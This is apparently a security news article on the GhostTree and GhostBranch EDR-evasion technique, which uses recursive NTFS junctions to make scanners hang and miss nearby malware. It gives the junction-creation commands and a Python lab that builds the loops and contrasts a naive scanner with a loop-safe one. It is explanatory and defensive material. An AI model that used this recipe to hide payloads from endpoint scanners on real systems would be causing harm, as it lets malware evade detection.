Hackers News
CyberSecurity News

New GhostTree Attack Causing EDR Products to Hang and Leave Files

Sarah simpson
May 21, 2026

A novel evasion technique called GhostTree exploits NTFS junctions to create recursive directory loops.

Uncovered by Varonis Threat Labs, this method traps Endpoint Detection and Response (EDR) scanners in infinite paths, causing them to hang and ignore malicious payloads.

NTFS junctions are directory reparse points: an application that opens the junction directory is transparently redirected to another local directory, so to the application the target's contents appear to live under the junction's path.

Threat actors favor this feature because creating a junction needs only write permission on the directory where it is created, not administrative privileges (unlike NTFS symbolic links, which require a privilege or Developer Mode).

An attacker simply runs mklink /J <link> <target> in cmd.exe (or New-Item -ItemType Junction in PowerShell) to make a new path redirect to the target directory.

GhostTree Attack on EDR

NTFS itself, and the Win32 extended-length path syntax, allow paths of roughly 32,767 characters, but much Windows software still honours the classic MAX_PATH limit.

That classic limit is 260 characters, and for any scanner bound by it the limit caps how deep a recursive directory loop can be traversed before path operations start failing.

The foundational GhostBranch attack involves an adversary creating, inside a directory, a junction that points straight back to that parent directory.

This creates a logical loop: the child folder appears to contain everything in the parent, including itself. With single-letter folder names each level costs two characters (the name plus a separator), so a scanner bound by MAX_PATH can descend roughly 126 levels before the limit is hit.

GhostTree amplifies this exponentially by creating two or more child junctions in the same directory that all point back to the parent.

With two junctions the scanner has two choices at every level, so at a depth of 126 there are about 2^126 distinct paths (every shorter prefix is a valid path as well), all of which resolve to a single directory and a single executable. The resulting structure behaves like a complete binary tree that branches recursively until the operating system's path limit stops it.

EDR Scanning Failures

When a security product recursively scans such a directory and follows the junctions, it keeps descending into paths that only stop being generated at the OS path limit.

The scanning engine is consumed by the loop and hangs without completing its task, so malware placed next to the junctions is never scanned and goes undetected by the endpoint agent. A scanner that refuses to follow reparse points, or that tracks directories it has already visited by file ID, is not affected; the attack works only against engines that treat every path as a new directory.

Both variants are trivial to set up, but they scale very differently:

GhostBranch: one junction (child to parent); the number of paths grows linearly with depth, about 126 paths at the MAX_PATH limit.

GhostTree: two or more junctions (each child to the same parent); the number of paths grows exponentially with depth, about 2^126 paths at the same limit.

Varonis researchers successfully validated this evasion technique by testing it directly against Windows Defender.

Microsoft initially closed the bug report without action, stating that bypassing an antivirus engine does not qualify as crossing a defined security boundary.

Despite this initial stance, Microsoft eventually deployed a patch to resolve the underlying recursive scanning vulnerability.

Because endpoint scanners can be subverted by logical file-system loops, organizations should not rely on the scanner alone and must layer controls.

Security operations teams should monitor file-system activity for junction creation (a new directory immediately given a reparse point), and treat as suspicious any junction whose target is its own parent or an ancestor, since no legitimate workflow needs a directory that contains itself.

Looking for these self-referential structures before anything in them executes is the practical way to catch GhostBranch and GhostTree activity, and a scan job whose directory count explodes or whose runtime never ends is a secondary signal worth alerting on.
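To make both the path-count blow-up and the fix concrete, the following is an added example written for this page, not code from Varonis or Microsoft. It builds a GhostBranch (one loop link) and a GhostTree (two loop links) lab in a temporary directory, runs a naive link-following scanner against each with an artificial depth cap so it terminates, and then runs a loop-proof scanner that skips reparse points and deduplicates directories by file ID. Assumptions: on Windows the loop links are real NTFS junctions created with mklink /J; on other systems a symbolic link stands in for the junction; the payload file name and its contents are constructed and harmless.

```python
"""GhostBranch / GhostTree lab and a loop-safe scanner (added example, not Varonis's code)."""
import os
import stat
import subprocess
import tempfile

PAYLOAD_NAME = "payload.bin"  # constructed stand-in for the "malicious" file


def make_loop_link(link_path, target_dir):
    """Create a directory link that points back at target_dir.

    On Windows this is a real NTFS junction (mklink /J, no admin rights needed,
    exactly as the article describes).  Elsewhere a symlink stands in for the
    junction so the loop behaviour can be shown on a POSIX box (assumption).
    """
    if os.name == "nt":
        subprocess.run(["cmd", "/c", "mklink", "/J", link_path, target_dir],
                       check=True, capture_output=True)
    else:
        os.symlink(target_dir, link_path, target_is_directory=True)


def build_lab(root, link_count):
    """Build parent/ with one payload file and link_count child links -> parent.

    link_count == 1 is GhostBranch, link_count == 2 is GhostTree.  Child links
    use single-letter names (a, b, ...) to maximise reachable depth under MAX_PATH.
    """
    parent = os.path.join(root, "parent")
    os.makedirs(parent)
    with open(os.path.join(parent, PAYLOAD_NAME), "wb") as fh:
        fh.write(b"constructed sample, not malware")
    for i in range(link_count):
        make_loop_link(os.path.join(parent, chr(ord("a") + i)), parent)
    return parent


def naive_scan(path, max_depth):
    """A scanner that follows links, the way the trapped EDR engines did.

    Returns (directory_paths_enumerated, payload_sightings).  Real engines have
    no max_depth: they stop only at the OS path limit (about 126 levels per the
    article, i.e. 2**126 paths for GhostTree).  The cap exists only so this
    demonstration terminates.
    """
    dirs = 0
    hits = 0

    def walk(d, depth):
        nonlocal dirs, hits
        dirs += 1
        with os.scandir(d) as it:
            for entry in it:
                if entry.is_dir():  # follow_symlinks=True by default: walks into the loop
                    if depth < max_depth:
                        walk(entry.path, depth + 1)
                elif entry.name == PAYLOAD_NAME:
                    hits += 1

    walk(path, 0)
    return dirs, hits


def is_reparse_point(entry):
    """True for symlinks and for NTFS reparse points (junctions, mount points)."""
    if entry.is_symlink():
        return True
    st = entry.stat(follow_symlinks=False)
    attrs = getattr(st, "st_file_attributes", 0)  # field exists only on Windows
    return bool(attrs & stat.FILE_ATTRIBUTE_REPARSE_POINT)


def safe_scan(path):
    """Loop-proof scanner: never follows reparse points and visits each real
    directory once, keyed on (st_dev, st_ino), so even a link the attribute
    check misses cannot cause a second visit.
    Returns (real_dirs_visited, payload_paths, skipped_links).
    """
    seen = set()
    payloads = []
    skipped = []
    stack = [path]
    while stack:
        d = stack.pop()
        st = os.stat(d)
        key = (st.st_dev, st.st_ino)
        if key in seen:
            continue
        seen.add(key)
        with os.scandir(d) as it:
            for entry in it:
                if is_reparse_point(entry):
                    skipped.append(entry.path)  # worth logging: this is the GhostTree signal
                    continue
                if entry.is_dir(follow_symlinks=False):
                    stack.append(entry.path)
                elif entry.is_file(follow_symlinks=False) and entry.name == PAYLOAD_NAME:
                    payloads.append(entry.path)
    return len(seen), payloads, skipped


def demo(link_count, max_depth=6):
    """Run both scanners against a fresh lab and return (naive_result, safe_result)."""
    with tempfile.TemporaryDirectory() as tmp:
        parent = build_lab(tmp, link_count)
        return naive_scan(parent, max_depth), safe_scan(parent)


if __name__ == "__main__":
    for n, name in ((1, "GhostBranch"), (2, "GhostTree")):
        (dirs, hits), (real_dirs, payloads, links) = demo(n)
        print(f"{name}: naive scanner enumerated {dirs} directory paths and saw the payload "
              f"{hits} times; safe scanner visited {real_dirs} real directory, found "
              f"{len(payloads)} payload file, skipped {len(links)} loop link(s)")
```

With the depth cap at 6 the naive scanner enumerates 7 directory paths for GhostBranch but 127 (2^7 - 1) for GhostTree, and that count doubles with every extra level, which is why an uncapped engine never returns; the safe scanner visits the one real directory, scans the payload once, and reports the loop links it refused to follow, which is exactly the list a detection rule should raise on.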

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags: Attack, Exploit, Malware, Patch, Security, Threat, Vulnerability

Sarah simpson

Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.

All Rights Reserved by HackersRadar ©2026